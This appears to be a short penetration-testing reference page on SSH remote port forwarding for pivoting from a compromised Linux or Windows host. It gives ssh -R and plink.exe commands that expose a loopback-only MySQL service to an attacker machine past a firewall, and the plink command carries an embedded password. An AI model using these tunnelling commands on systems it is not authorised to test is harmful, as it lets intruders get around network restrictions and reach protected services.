Remote Port Forwarding

This is the exact opposite of local port forwarding, where any connection that reaches a port on a remote server is forwarded to a port on the local system.

Scenario/Goal

Here, the target system is Linux

Let there be 2 systems - A,B,

A->B connections are restricted by a firewall or the server accepts only loopback requests

B->A SSH connection is possible

System A
Requirement

Level of Compromise

Root Access with password

Softwares

SSH

IP

192.168.1.10

System B
Requirement

Level of Compromise

User access

Softwares

SSH, Service to be accessed (e.g Mysql)

IP

192.168.1.20

System B (Linux System)

ssh -N -R 192.168.1.10:2221:127.0.0.1:3306 [email protected]

System B (Windows System)

Here, the target system is Windows

In the case of a Windows system, we can apply the same method using a tool meant for SSH in Windows - plink.exe

cmd.exe /c echo y | plink.exe -ssh -l kali - pw userpassword -R 192.168.1.10:3306:127.0.0.1:3306 192.168.1.10

The first section of the command "/c echo y" is to pipe the answer to the prompt when the exe is executed. Without the first section you will have to interactive step to key in "y".

Last updated

Was this helpful?